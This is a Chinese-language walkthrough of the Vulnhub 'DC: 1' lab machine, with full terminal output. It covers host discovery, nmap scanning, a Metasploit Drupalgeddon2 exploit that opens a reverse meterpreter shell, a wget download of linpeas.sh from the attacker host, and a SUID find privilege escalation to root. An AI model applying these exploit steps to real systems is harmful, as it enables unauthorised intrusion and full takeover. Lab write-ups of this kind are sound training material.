Vulnhub之DC 1靶機詳細測試過程
阿新 • • 發佈:2022-12-04
DC 1
作者: jason_huawen
靶機基本資訊
名稱:DC: 1
地址:
https://www.vulnhub.com/entry/dc-1,292/
識別目標主機IP地址
┌──(kali㉿kali)-[~/Vulnhub/DC_1] └─$ sudo netdiscover -i eth1 Currently scanning: 192.168.171.0/16 | Screen View: Unique Hosts 3 Captured ARP Req/Rep packets, from 3 hosts. Total size: 180 _____________________________________________________________________________ IP At MAC Address Count Len MAC Vendor / Hostname ----------------------------------------------------------------------------- 192.168.56.1 0a:00:27:00:00:0a 1 60 Unknown vendor 192.168.56.100 08:00:27:55:6f:ee 1 60 PCS Systemtechnik GmbH 192.168.56.252 08:00:27:86:65:45 1 60 PCS Systemtechnik GmbH
利用Kali Linux自帶的netdiscover工具識別目標主機的IP地址為192.168.56.252
NMAP掃描
┌──(kali㉿kali)-[~/Vulnhub/DC_1] └─$ sudo nmap -sS -sV -sC -p- 192.168.56.252 -oN nmap_full_scan Starting Nmap 7.92 ( https://nmap.org ) at 2022-12-03 22:29 EST Nmap scan report for localhost (192.168.56.252) Host is up (0.00023s latency). Not shown: 65531 closed tcp ports (reset) PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 6.0p1 Debian 4+deb7u7 (protocol 2.0) | ssh-hostkey: | 1024 c4:d6:59:e6:77:4c:22:7a:96:16:60:67:8b:42:48:8f (DSA) | 2048 11:82:fe:53:4e:dc:5b:32:7f:44:64:82:75:7d:d0:a0 (RSA) |_ 256 3d:aa:98:5c:87:af:ea:84:b8:23:68:8d:b9:05:5f:d8 (ECDSA) 80/tcp open http Apache httpd 2.2.22 ((Debian)) | http-robots.txt: 36 disallowed entries (15 shown) | /includes/ /misc/ /modules/ /profiles/ /scripts/ | /themes/ /CHANGELOG.txt /cron.php /INSTALL.mysql.txt | /INSTALL.pgsql.txt /INSTALL.sqlite.txt /install.php /INSTALL.txt |_/LICENSE.txt /MAINTAINERS.txt |_http-title: Welcome to Drupal Site | Drupal Site |_http-generator: Drupal 7 (http://drupal.org) |_http-server-header: Apache/2.2.22 (Debian) 111/tcp open rpcbind 2-4 (RPC #100000) | rpcinfo: | program version port/proto service | 100000 2,3,4 111/tcp rpcbind | 100000 2,3,4 111/udp rpcbind | 100000 3,4 111/tcp6 rpcbind | 100000 3,4 111/udp6 rpcbind | 100024 1 34380/udp6 status | 100024 1 37326/tcp status | 100024 1 44788/udp status |_ 100024 1 59563/tcp6 status 37326/tcp open status 1 (RPC #100024) MAC Address: 08:00:27:86:65:45 (Oracle VirtualBox virtual NIC) Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 15.18 seconds
NMAP掃描結果表明目標主機有4個開放埠:22(SSH)、80(HTTP)、111(RPC)、37326(RPC)
獲得Shell
訪問80埠,發現目標主機執行drupal CMS,在metasploit查詢一下是否可以有可利用的模組,依次嘗試,在嘗試第二個模組時,成功得到了目標的shell
msf6 exploit(unix/webapp/drupal_coder_exec) > search drupal Matching Modules ================ # Name Disclosure Date Rank Check Description - ---- --------------- ---- ----- ----------- 0 exploit/unix/webapp/drupal_coder_exec 2016-07-13 excellent Yes Drupal CODER Module Remote Command Execution 1 exploit/unix/webapp/drupal_drupalgeddon2 2018-03-28 excellent Yes Drupal Drupalgeddon 2 Forms API Property Injection 2 exploit/multi/http/drupal_drupageddon 2014-10-15 excellent No Drupal HTTP Parameter Key/Value SQL Injection 3 auxiliary/gather/drupal_openid_xxe 2012-10-17 normal Yes Drupal OpenID External Entity Injection 4 exploit/unix/webapp/drupal_restws_exec 2016-07-13 excellent Yes Drupal RESTWS Module Remote PHP Code Execution 5 exploit/unix/webapp/drupal_restws_unserialize 2019-02-20 normal Yes Drupal RESTful Web Services unserialize() RCE 6 auxiliary/scanner/http/drupal_views_user_enum 2010-07-02 normal Yes Drupal Views Module Users Enumeration 7 exploit/unix/webapp/php_xmlrpc_eval 2005-06-29 excellent Yes PHP XML-RPC Arbitrary Code Execution Interact with a module by name or index. For example info 7, use 7 or use exploit/unix/webapp/php_xmlrpc_eval msf6 exploit(unix/webapp/drupal_coder_exec) > use exploit/unix/webapp/drupal_drupalgeddon2 [*] No payload configured, defaulting to php/meterpreter/reverse_tcp msf6 exploit(unix/webapp/drupal_drupalgeddon2) > show options Module options (exploit/unix/webapp/drupal_drupalgeddon2): Name Current Setting Required Description ---- --------------- -------- ----------- DUMP_OUTPUT false no Dump payload command output PHP_FUNC passthru yes PHP function to execute Proxies no A proxy chain of format type:host:port[,type:host:port][...] RHOSTS yes The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Usi ng-Metasploit RPORT 80 yes The target port (TCP) SSL false no Negotiate SSL/TLS for outgoing connections TARGETURI / yes Path to Drupal install VHOST no HTTP server virtual host Payload options (php/meterpreter/reverse_tcp): Name Current Setting Required Description ---- --------------- -------- ----------- LHOST 10.0.2.15 yes The listen address (an interface may be specified) LPORT 4444 yes The listen port Exploit target: Id Name -- ---- 0 Automatic (PHP In-Memory) msf6 exploit(unix/webapp/drupal_drupalgeddon2) > set LHOST 192.168.56.206 LHOST => 192.168.56.206 msf6 exploit(unix/webapp/drupal_drupalgeddon2) > set LPORT 5555 LPORT => 5555 msf6 exploit(unix/webapp/drupal_drupalgeddon2) > set RHOSTS 192.168.56.252 RHOSTS => 192.168.56.252 msf6 exploit(unix/webapp/drupal_drupalgeddon2) > exploit [*] Started reverse TCP handler on 192.168.56.206:5555 [*] Running automatic check ("set AutoCheck false" to disable) [!] The service is running, but could not be validated. [*] Sending stage (39927 bytes) to 192.168.56.252 [*] Meterpreter session 1 opened (192.168.56.206:5555 -> 192.168.56.252:48156) at 2022-12-03 22:45:18 -0500 id meterpreter > id [-] Unknown command: id meterpreter > shell Process 3126 created. Channel 0 created. id uid=33(www-data) gid=33(www-data) groups=33(www-data)
www-data@DC-1:/var/www$ cat flag1.txt
cat flag1.txt
Every good CMS needs a config file - and so do you.
www-data@DC-1:/var/www$
拿到了第1個flag。
www-data@DC-1:/home/flag4$ ls -alh
ls -alh
total 28K
drwxr-xr-x 2 flag4 flag4 4.0K Feb 19 2019 .
drwxr-xr-x 3 root root 4.0K Feb 19 2019 ..
-rw------- 1 flag4 flag4 28 Feb 19 2019 .bash_history
-rw-r--r-- 1 flag4 flag4 220 Feb 19 2019 .bash_logout
-rw-r--r-- 1 flag4 flag4 3.4K Feb 19 2019 .bashrc
-rw-r--r-- 1 flag4 flag4 675 Feb 19 2019 .profile
-rw-r--r-- 1 flag4 flag4 125 Feb 19 2019 flag4.txt
www-data@DC-1:/home/flag4$ cat flag4.txt
cat flag4.txt
Can you use this same method to find or access the flag in root?
Probably. But perhaps it's not that easy. Or maybe it is?
www-data@DC-1:/home/flag4$
拿到了第4個flag。
提權
將Linpeas.sh指令碼上傳至目標主機的/tmp目錄下,修改許可權,並執行指令碼,輸出結果中提示可以利用Find命令的SUID位進行提權:
www-data@DC-1:/home/flag4$ cd /tmp
cd /tmp
www-data@DC-1:/tmp$ wget http://192.168.56.206:8000/linpeas.sh
wget http://192.168.56.206:8000/linpeas.sh
--2022-12-04 13:50:12-- http://192.168.56.206:8000/linpeas.sh
Connecting to 192.168.56.206:8000... connected.
HTTP request sent, awaiting response... 200 OK
Length: 765823 (748K) [text/x-sh]
Saving to: `linpeas.sh'
100%[======================================>] 765,823 --.-K/s in 0.007s
2022-12-04 13:50:12 (111 MB/s) - `linpeas.sh' saved [765823/765823]
www-data@DC-1:/tmp$ chmod +x linpeas.sh
chmod +x linpeas.sh
www-data@DC-1:/tmp$ ./linpeas.sh
./linpeas.sh
▄▄▄▄▄▄▄▄▄▄▄▄▄▄
▄▄▄▄▄▄▄ ▄▄▄▄▄▄▄▄
▄▄▄▄▄▄▄ ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄ ▄▄▄▄
▄▄▄▄ ▄ ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄ ▄▄▄▄▄▄
▄ ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄
▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄ ▄▄▄▄▄ ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄
▄▄▄▄▄▄▄▄▄▄▄ ▄▄▄▄▄▄ ▄▄▄▄▄▄ ▄
▄▄▄▄▄▄ ▄▄▄▄▄▄▄▄ ▄▄▄▄
▄▄ ▄▄▄ ▄▄▄▄▄ ▄▄▄
▄▄ ▄▄▄▄▄▄▄▄▄▄▄▄ ▄▄
▄ ▄▄ ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄ ▄▄
▄ ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄
▄▄▄▄▄▄▄▄▄▄▄▄▄▄ ▄▄▄▄
▄▄▄▄▄ ▄▄▄▄▄ ▄▄▄▄▄▄ ▄▄▄▄
▄▄▄▄ ▄▄▄▄▄ ▄▄▄▄▄ ▄ ▄▄
▄▄▄▄▄ ▄▄▄▄▄ ▄▄▄▄▄▄▄ ▄▄▄▄▄ ▄▄▄▄▄
▄▄▄▄▄▄ ▄▄▄▄▄▄▄ ▄▄▄▄▄▄▄ ▄▄▄▄▄▄▄ ▄▄▄▄▄
▄▄▄▄▄▄▄▄▄▄▄▄▄▄ ▄ ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄
▄▄▄▄▄▄▄▄▄▄▄▄▄ ▄▄▄▄▄▄▄▄▄▄▄▄▄▄
▄▄▄▄▄▄▄▄▄▄▄ ▄▄▄▄▄▄▄▄▄▄▄▄▄▄
▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄ ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄
▀▀▄▄▄ ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄ ▄▄▄▄▄▄▄▀▀▀▀▀▀
▀▀▀▄▄▄▄▄ ▄▄▄▄▄▄▄▄▄▄ ▄▄▄▄▄▄▀▀
▀▀▀▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▀▀▀
/---------------------------------------------------------------------------\
| Do you like PEASS? |
|---------------------------------------------------------------------------|
| Become a Patreon : https://www.patreon.com/peass |
| Follow on Twitter : @carlospolopm |
| Respect on HTB : SirBroccoli |
|---------------------------------------------------------------------------|
| Thank you! |
\---------------------------------------------------------------------------/
linpeas-ng by carlospolop
ADVISORY: This script should be used for authorized penetration testing and/or educational purposes only. Any misuse of this software will not be the responsibility of the author or of any other collaborator. Use it at your own computers and/or with the computer owner's permission.
Linux Privesc Checklist: https://book.hacktricks.xyz/linux-unix/linux-privilege-escalation-checklist
LEGEND:
RED/YELLOW: 95% a PE vector
RED: You should take a look to it
LightCyan: Users with console
Blue: Users without console & mounted devs
Green: Common things (users, groups, SUID/SGID, mounts, .sh scripts, cronjobs)
LightMagenta: Your username
Starting linpeas. Caching Writable Folders...
╔═══════════════════╗
═════════════════════════════════════════╣ Basic information ╠═════════════════════════════════════════
╚═══════════════════╝
OS: Linux version 3.2.0-6-486 ([email protected]) (gcc version 4.9.2 (Debian 4.9.2-10+deb7u1) ) #1 Debian 3.2.102-1
User & Groups: uid=33(www-data) gid=33(www-data) groups=33(www-data)
Hostname: DC-1
Writable folder: /run/shm
[+] /bin/ping is available for network discovery (linpeas can discover hosts, learn more with -h)
[+] /bin/nc is available for network discover & port scanning (linpeas can discover hosts and scan ports, learn more with -h)
═════════════════════════════════════════╣ Interesting Files ╠═════════════════════════════════════════
╚═══════════════════╝
╔══════════╣ SUID - Check easy privesc, exploits and write perms
╚ https://book.hacktricks.xyz/linux-unix/privilege-escalation#sudo-and-suid
strace Not Found
-rwsr-xr-x 1 root root 87K Dec 10 2012 /bin/mount ---> Apple_Mac_OSX(Lion)_Kernel_xnu-1699.32.7_except_xnu-1699.24.8
-rwsr-xr-x 1 root root 31K Apr 13 2011 /bin/ping
-rwsr-xr-x 1 root root 35K Feb 27 2017 /bin/su
-rwsr-xr-x 1 root root 35K Apr 13 2011 /bin/ping6
-rwsr-xr-x 1 root root 67K Dec 10 2012 /bin/umount ---> BSD/Linux(08-1996)
-rwsr-sr-x 1 daemon daemon 50K Oct 4 2014 /usr/bin/at ---> RTru64_UNIX_4.0g(CVE-2002-1614)
-rwsr-xr-x 1 root root 36K Feb 27 2017 /usr/bin/chsh
-rwsr-xr-x 1 root root 45K Feb 27 2017 /usr/bin/passwd ---> Apple_Mac_OSX(03-2006)/Solaris_8/9(12-2004)/SPARC_8/9/Sun_Solaris_2.3_to_2.5.1(02-1997)
-rwsr-xr-x 1 root root 31K Feb 27 2017 /usr/bin/newgrp ---> HP-UX_10.20
-rwsr-xr-x 1 root root 44K Feb 27 2017 /usr/bin/chfn ---> SuSE_9.3/10
-rwsr-xr-x 1 root root 65K Feb 27 2017 /usr/bin/gpasswd
-rwsr-sr-x 1 root mail 82K Nov 18 2017 /usr/bin/procmail
-rwsr-xr-x 1 root root 159K Jan 6 2012 /usr/bin/find
-rwsr-xr-x 1 root root 916K Feb 11 2018 /usr/sbin/exim4
-rwsr-xr-x 1 root root 9.5K Jun 20 2017 /usr/lib/pt_chown ---> GNU_glibc_2.1/2.1.1_-6(08-1999)
-rwsr-xr-x 1 root root 243K Jan 27 2018 /usr/lib/openssh/ssh-keysign
-rwsr-xr-x 1 root root 5.3K Mar 28 2017 /usr/lib/eject/dmcrypt-get-device
-rwsr-xr-- 1 root messagebus 315K Feb 10 2015 /usr/lib/dbus-1.0/dbus-daemon-launch-helper
-rwsr-xr-x 1 root root 83K May 22 2013 /sbin/mount.nfs
╔══════════╣ SGID
╚ https://book.hacktricks.xyz/linux-unix/privilege-escalation#sudo-and-suid
-rwxr-sr-x 1 root ssh 126K Jan 27 2018 /usr/bin/ssh-agent
-rwsr-sr-x 1 daemon daemon 50K Oct 4 2014 /usr/bin/at ---> RTru64_UNIX_4.0g(CVE-2002-1614)
-rwxr-sr-x 1 root mlocate 30K Sep 25 2010 /usr/bin/mlocate
-rwxr-sr-x 1 root mail 18K Nov 18 2017 /usr/bin/lockfile
-rwxr-sr-x 1 root shadow 49K Feb 27 2017 /usr/bin/chage
-rwxr-sr-x 1 root tty 9.5K Jun 11 2012 /usr/bin/bsd-write
-rwxr-sr-x 1 root mail 9.6K Nov 30 2014 /usr/bin/mutt_dotlock
-rwxr-sr-x 1 root tty 18K Dec 10 2012 /usr/bin/wall
-rwxr-sr-x 1 root crontab 34K Jul 4 2012 /usr/bin/crontab
-rwxr-sr-x 1 root shadow 18K Feb 27 2017 /usr/bin/expiry
-rwsr-sr-x 1 root mail 82K Nov 18 2017 /usr/bin/procmail
-rwxr-sr-x 1 root mail 14K Dec 12 2012 /usr/bin/dotlockfile
-rwxr-sr-x 1 root utmp 4.9K Feb 21 2011 /usr/lib/utempter/utempter
-rwxr-sr-x 1 root shadow 30K May 5 2012 /sbin/unix_chkpwd
查詢GTFOBINS網站所給出的方法進行提權:
www-data@DC-1:/tmp$ /usr/bin/find . -exec /bin/sh -p \; -quit
/usr/bin/find . -exec /bin/sh -p \; -quit
/bin/sh: 0: Illegal option -p
/bin/sh: 0: Illegal option -p
/bin/sh: 0: Illegal option -p
/bin/sh: 0: Illegal option -p
www-data@DC-1:/tmp$ ls -alh /usr/bin/find
ls -alh /usr/bin/find
-rwsr-xr-x 1 root root 159K Jan 6 2012 /usr/bin/find
但是執行失敗,其實將sh修改為bash即可
www-data@DC-1:/tmp$ find . -exec /bin/bash -p \; -quit
find . -exec /bin/bash -p \; -quit
bash-4.2# cd /root
cd /root
bash-4.2# ls -alh
ls -alh
total 32K
drwx------ 4 root root 4.0K Feb 28 2019 .
drwxr-xr-x 23 root root 4.0K Feb 19 2019 ..
drwx------ 2 root root 4.0K Feb 19 2019 .aptitude
-rw------- 1 root root 44 Feb 28 2019 .bash_history
-rw-r--r-- 1 root root 949 Feb 19 2019 .bashrc
drwxr-xr-x 3 root root 4.0K Feb 19 2019 .drush
-rw-r--r-- 1 root root 140 Nov 20 2007 .profile
-rw-r--r-- 1 root root 173 Feb 19 2019 thefinalflag.txt
bash-4.2# cat thefinalflag.txt
cat thefinalflag.txt
Well done!!!!
Hopefully you've enjoyed this and learned some new skills.
You can let me know what you thought of this little journey
by contacting me via Twitter - @DCAU7
bash-4.2#
經驗教訓
- GTFOBINS網站給出的方法並不完全照搬,可能需要根據具體情況進行嘗試。